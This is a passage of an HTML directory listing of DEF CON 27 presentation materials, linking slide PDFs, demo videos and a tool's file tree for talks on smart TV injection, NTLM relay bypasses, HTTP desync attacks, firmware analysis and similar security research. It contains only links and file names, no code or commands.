&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Pedro-Cabrera-SDR-Against-Smart-TVs-URL-and-Channel-Injection-Attacks-Demo-Video/PedroCabrera%20-%20SDR%20Against%20Smart%20TVs_video3-NotFinal.mp4"&gt;PedroCabrera - SDR Against Smart TVs_video3-NotFinal.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Pedro-Cabrera-SDR-Against-Smart-TVs-URL-and-Channel-Injection-Attacks-Demo-Video/PedroCabrera%20-%20SDR%20Against%20Smart%20TVs_video4.mp4"&gt;PedroCabrera - SDR Against Smart TVs_video4.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Pedro-Cabrera-SDR-Against-Smart-TVs-URL-and-Channel-Injection-Attacks-Demo-Video/PedroCabrera%20-%20SDR%20Against%20Smart%20TVs_video5_inject_URL.mp4"&gt;PedroCabrera - SDR Against Smart TVs_video5_inject_URL.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Pedro-Cabrera-SDR-Against-Smart-TVs-URL-and-Channel-Injection-Attacks-Demo-Video/PedroCabrera%20-%20SDR%20Against%20Smart%20TVs_video6-IISS-SDR.mp4"&gt;PedroCabrera - SDR Against Smart TVs_video6-IISS-SDR.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Pedro-Cabrera-SDR-Against-Smart-TVs-URL-and-Channel-Injection-Attacks-Demo-Video/PedroCabrera%20-%20SDR%20Against%20Smart%20TVs_video7-IISS-DNS.mp4"&gt;PedroCabrera - SDR Against Smart TVs_video7-IISS-DNS.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Pedro-Cabrera-SDR-Against-Smart-TVs-URL-and-Channel-Injection-Attacks-Demo-Video/PedroCabrera%20-%20SDR%20Against%20Smart%20TVs_video8-KL.mp4"&gt;PedroCabrera - SDR Against Smart TVs_video8-KL.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Pedro-Cabrera-SDR-Against-Smart-TVs-URL-and-Channel-Injection-Attacks-Demo-Video/PedroCabrera%20-%20SDR%20Against%20Smart%20TVs_video9-Mi.mp4"&gt;PedroCabrera - SDR Against Smart TVs_video9-Mi.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Sheila-A-Berta-Backdooring-hardware-devices-by-injecting-malicious-payloads-on-Microcontrollers.pdf"&gt;Sheila-A-Berta-Backdooring-hardware-devices-by-injecting-malicious-payloads-on-Microcontrollers.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Sheila-A-Berta-Backdooring-hardware-devices-by-injecting-malicious-payloads-on-Microcontrollers-Demo-Video/CARSECU_demo.mp4"&gt;CARSECU_demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Sheila-A-Berta-Backdooring-hardware-devices-by-injecting-malicious-payloads-on-Microcontrollers-Demo-Video/EUSART_demo.mp4"&gt;EUSART_demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Sheila-A-Berta-Backdooring-hardware-devices-by-injecting-malicious-payloads-on-Microcontrollers-Demo-Video/ROP_demo.mp4"&gt;ROP_demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Xiling-Gong-Peter-Pi-Exploiting-Qualcomm-WLAN-and-Modem-Over-The-Air.pdf"&gt;Xiling-Gong-Peter-Pi-Exploiting-Qualcomm-WLAN-and-Modem-Over-The-Air.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Xiling-Gong-and-Peter-Pi-Exploiting-Qualcomm-WLAN-and-Modem-Over-The-Air-Demo-Video/demo%20-%20xiling%20gong,%20peter%20pi%20-%20exploiting%20qualcomm%20wlan%20and%20modem%20over%20the%20air.mp4"&gt;demo - xiling gong, peter pi - exploiting qualcomm wlan and modem over the air.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Xiling-Gong-and-Peter-Pi-Exploiting-Qualcomm-WLAN-and-Modem-Over-The-Air-Demo-Video/demo%20-%20xiling%20gong,%20peter%20pi%20-%20exploiting%20qualcomm%20wlan%20and%20modem%20over%20the%20air_1.mp4"&gt;demo - xiling gong, peter pi - exploiting qualcomm wlan and modem over the air_1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Yaron-Zinar-and-Marina-Simakov-Relaying-Credentials-Has-Never-Been-Easier-How-to-Easily-Bypass-the-Latest-NTLM-Relay-Mitigations.pdf"&gt;Yaron-Zinar-and-Marina-Simakov-Relaying-Credentials-Has-Never-Been-Easier-How-to-Easily-Bypass-the-Latest-NTLM-Relay-Mitigations.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Yaron-Zinar-and-Marina-Simakov-Relaying-Credentials-Has-Never-Been-Easier-Demo-Video/Zinar%20Simakov%20-%20epa_bypass_final.mp4"&gt;Zinar Simakov - epa_bypass_final.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Yaron-Zinar-and-Marina-Simakov-Relaying-Credentials-Has-Never-Been-Easier-Demo-Video/Zinar%20Simakov%20-%20session_key_final.mp4"&gt;Zinar Simakov - session_key_final.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks.pdf"&gt;albinowax-HTTP-Desync-Attacks.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-whitepaper.pdf"&gt;albinowax-HTTP-Desync-Attacks-whitepaper.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-demo.mp4"&gt;albinowax-HTTP-Desync-Attacks-demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;albinowax-HTTP-Desync-Attacks-tool

&lt;ul&gt;
&lt;li&gt;build

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-tool/build/classes/"&gt;classes/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-tool/build/libs/"&gt;libs/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-tool/build/resources/"&gt;resources/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-tool/build/tmp/"&gt;tmp/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;out

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-tool/out/artifacts/"&gt;artifacts/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-tool/out/production/"&gt;production/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;resources

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-tool/resources/CL-TE.py"&gt;CL-TE.py&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-tool/resources/TE-CL.py"&gt;TE-CL.py&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;src

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-tool/src/burp/"&gt;burp/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-tool/build.gradle"&gt;build.gradle&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-tool/readme.md"&gt;readme.md&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-tool/sqlite-jdbc-3.23.1.jar"&gt;sqlite-jdbc-3.23.1.jar&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-albinowax-HTTP-Desync-Attacks-tool/turbo-intruder-all.jar"&gt;turbo-intruder-all.jar&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-finalphoenix-Rise-of-the-Hypebots.pdf"&gt;finalphoenix-Rise-of-the-Hypebots.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-finalphoenix-Rise-of-the-Hypebots-Demo-Video/DEFCON-27-finalphoenix-Rise-of-the-Hypebots-Complicated%20Bot.mp4"&gt;finalphoenix-Rise-of-the-Hypebots-Complicated Bot.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-finalphoenix-Rise-of-the-Hypebots-Demo-Video/DEFCON-27-finalphoenix-Rise-of-the-Hypebots-botsThatBot.mp4"&gt;finalphoenix-Rise-of-the-Hypebots-botsThatBot.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-finalphoenix-Rise-of-the-Hypebots-Demo-Video/DEFCON-27-finalphoenix-Rise-of-the-Hypebots-fancy-monitor.mp4"&gt;finalphoenix-Rise-of-the-Hypebots-fancy-monitor.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-finalphoenix-Rise-of-the-Hypebots-Demo-Video/DEFCON-27-finalphoenix-Rise-of-the-Hypebots-puppeteerBot.mp4"&gt;finalphoenix-Rise-of-the-Hypebots-puppeteerBot.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-finalphoenix-Rise-of-the-Hypebots-Demo-Video/DEFCON-27-finalphoenix-Rise-of-the-Hypebots-simple-monitor.mp4"&gt;finalphoenix-Rise-of-the-Hypebots-simple-monitor.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Alexandre-Borges-dotNET-Malware-Threats.pdf"&gt;Alexandre-Borges-dotNET-Malware-Threats.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Alon-Weinberg-Please-inject-me-a-x64-code-injection.pdf"&gt;Alon-Weinberg-Please-inject-me-a-x64-code-injection.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Alon-Weinberg-Please-inject-me-a-x64-code-injection-Demo.mp4"&gt;Alon-Weinberg-Please-inject-me-a-x64-code-injection-Demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Alvaro-Munoz-Oleksandr-Mirosh-SSOWars-The-Token-Menace.pdf"&gt;Alvaro-Munoz-Oleksandr-Mirosh-SSOWars-The-Token-Menace.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Alvaro-Munoz-Oleksandr-Mirosh-SSOWars-The-Token-Menace-Demo-Videos.zip"&gt;Alvaro-Munoz-Oleksandr-Mirosh-SSOWars-The-Token-Menace-Demo-Videos.zip&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Amit-Waisel-and-Hila-Cohen-malproxy.pdf"&gt;Amit-Waisel-and-Hila-Cohen-malproxy.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Amit-Waisel-and-Hila-Cohen-malproxy-demo.mp4"&gt;Amit-Waisel-and-Hila-Cohen-malproxy-demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Andreas-Baumhof-Are-Quantum-Computers-Really-A-Threat-To-Cryptography.pdf"&gt;Andreas-Baumhof-Are-Quantum-Computers-Really-A-Threat-To-Cryptography.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Andy-Grant-Unpacking-pkgs.pdf"&gt;Andy-Grant-Unpacking-pkgs.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Andy-Grant-Unpacking-pkgs.mp4"&gt;Andy-Grant-Unpacking-pkgs.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Ariel-Adversariel-Herbert-Voss-Dont-Red-Team-AI-like-a-Chump.pdf"&gt;Ariel-Adversariel-Herbert-Voss-Dont-Red-Team-AI-like-a-Chump.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Ben-Morris-More-Keys-Than-A-Piano-Finding-Secrets-In-Publicly-Exposed-Ebs-Volumes.pdf"&gt;Ben-Morris-More-Keys-Than-A-Piano-Finding-Secrets-In-Publicly-Exposed-Ebs-Volumes.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf"&gt;Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Bill-Swearingen-HAKC-The-Police.pdf"&gt;Bill-Swearingen-HAKC-The-Police.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Brad-Dixon-Cheating-in-eSports-How-to-cheat-at-virtual-cycling-using-USB-hacks.compressed.pdf"&gt;Brad-Dixon-Cheating-in-eSports-How-to-cheat-at-virtual-cycling-using-USB-hacks.compressed.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Brad-Dixon-Cheating-in-eSports-How-to-cheat-at-virtual-cycling-using-USB-hacks.pdf"&gt;Brad-Dixon-Cheating-in-eSports-How-to-cheat-at-virtual-cycling-using-USB-hacks.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Brent-Stone-Reverse-Enginerring-17-Cars.pdf"&gt;Brent-Stone-Reverse-Enginerring-17-Cars.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Brent-Stone-Reverse-Enginerring-17-Cars-Video-Demo.mp4"&gt;Brent-Stone-Reverse-Enginerring-17-Cars-Video-Demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Brizendine-Stroschein-The-JOP-ROCKET-DEMO-1.mp4"&gt;Brizendine-Stroschein-The-JOP-ROCKET-DEMO-1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Brizendine-Stroschein-The-JOP-ROCKET.pdf"&gt;Brizendine-Stroschein-The-JOP-ROCKET.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Brizendine-Stroschein-The-JOP-ROCKET-DEMO.mp4"&gt;Brizendine-Stroschein-The-JOP-ROCKET-DEMO.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Campbell-Murray-GSM-We-can-hear-everyone-now.pdf"&gt;Campbell-Murray-GSM-We-can-hear-everyone-now.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Christopher-Roberts-Firmware-Slap.pdf"&gt;Christopher-Roberts-Firmware-Slap.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Christopher-Roberts-DEMO-1.mp4"&gt;Christopher-Roberts-DEMO-1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Christopher-Roberts-DEMO-2.mp4"&gt;Christopher-Roberts-DEMO-2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Christopher-Roberts-Firmware-Slap-DEMO-1.wmv"&gt;Christopher-Roberts-Firmware-Slap-DEMO-1.wmv&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Christopher-Roberts-Firmware-Slap-DEMO-2.wmv"&gt;Christopher-Roberts-Firmware-Slap-DEMO-2.wmv&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Christopher-Roberts-Firmware-Slap-DEMO-3.wmv"&gt;Christopher-Roberts-Firmware-Slap-DEMO-3.wmv&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Dan-Regalado-Defcon27AliDan.pdf"&gt;Dan-Regalado-Defcon27AliDan.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Dan-Regalado-ARM-Syscalls.mp4"&gt;Dan-Regalado-ARM-Syscalls.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Daniel-Romero-and-Mario-Rivas-Why-you-should-fear-your-mundane-office.pdf"&gt;Daniel-Romero-and-Mario-Rivas-Why-you-should-fear-your-mundane-office.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Elliott-Thompson-Mi-Casa-Su-Casa.pdf"&gt;Elliott-Thompson-Mi-Casa-Su-Casa.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Elliott-Thompson-Mi-Casa-Su-Casa-Video-Demonstration.mp4"&gt;Elliott-Thompson-Mi-Casa-Su-Casa-Video-Demonstration.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Eyal-Itkin-Say-Cheese-How-I-Ransomwared-Your-DSLR-Camera.pdf"&gt;Eyal-Itkin-Say-Cheese-How-I-Ransomwared-Your-DSLR-Camera.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Eyal-Itkin-Say-Cheese-How-I-Ransomwared-Your-DSLR-Camera-Demo.mp4"&gt;Eyal-Itkin-Say-Cheese-How-I-Ransomwared-Your-DSLR-Camera-Demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Gregory-Pickett-Breaking-The-Back-End-It-Is-Not-Always-A-Bug.-Sometimes-It-Is-Just-Bad-Design.pdf"&gt;Gregory-Pickett-Breaking-The-Back-End-It-Is-Not-Always-A-Bug.-Sometimes-It-Is-Just-Bad-Design.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Gregory-Pickett-Breaking-The-Back-End-It-Is-Not-Always-A-Bug.-Sometimes-It-Is-Just-Bad-Design-Demo.mp4"&gt;Gregory-Pickett-Breaking-The-Back-End-It-Is-Not-Always-A-Bug.-Sometimes-It-Is-Just-Bad-Design-Demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jacob-Baines-Help-Me-Vulnerabilities.-Youre-My-Only-Hope.pdf"&gt;Jacob-Baines-Help-Me-Vulnerabilities.-Youre-My-Only-Hope.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Jesse-Michael-Get-off-the-kernel-if-you-cant-drive.pdf"&gt;Jesse-Michael-Get-off-the-kernel-if-you-cant-drive.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Joe-Grand-Badge.pdf"&gt;Joe-Grand-Badge.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Joe-Grand-The-DEFCON-27-Badge.pdf"&gt;Joe-Grand-The-Badge.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Joseph-Cox-How-You-Can-Buy-ATT-T-Mobile-and-Sprint-Real-Time-Location-Data-on-the-Black-Market.pdf"&gt;Joseph-Cox-How-You-Can-Buy-ATT-T-Mobile-and-Sprint-Real-Time-Location-Data-on-the-Black-Market.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Joseph-Menn-Change-the-World-cDc-Style.pdf"&gt;Joseph-Menn-Change-the-World-cDc-Style.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Junyu-Zhou-and-Ce-Qin-and-Jianing-Wang-Web2Own-Attacking-Desktop-Apps-From-Web-Securitys-Perspective.pdf"&gt;Junyu-Zhou-and-Ce-Qin-and-Jianing-Wang-Web2Own-Attacking-Desktop-Apps-From-Web-Securitys-Perspective.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Katherine-Pratt-Hacking-Your-Thoughts-Batman-Forever-meets-Black-Mirror.pdf"&gt;Katherine-Pratt-Hacking-Your-Thoughts-Batman-Forever-meets-Black-Mirror.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Katherine-Pratt-Hacking-Your-Thoughts-Batman-Forever-meets-Black-Mirror.pptx"&gt;Katherine-Pratt-Hacking-Your-Thoughts-Batman-Forever-meets-Black-Mirror.pptx&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Kyle-Gwinnup-Next-Generation-Process-Emulation-with-Binee.pdf"&gt;Kyle-Gwinnup-Next-Generation-Process-Emulation-with-Binee.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Kyle-Gwinnup-Next-Generation-Process-Emulation-with-Binee-Demo.mp4"&gt;Kyle-Gwinnup-Next-Generation-Process-Emulation-with-Binee-Demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
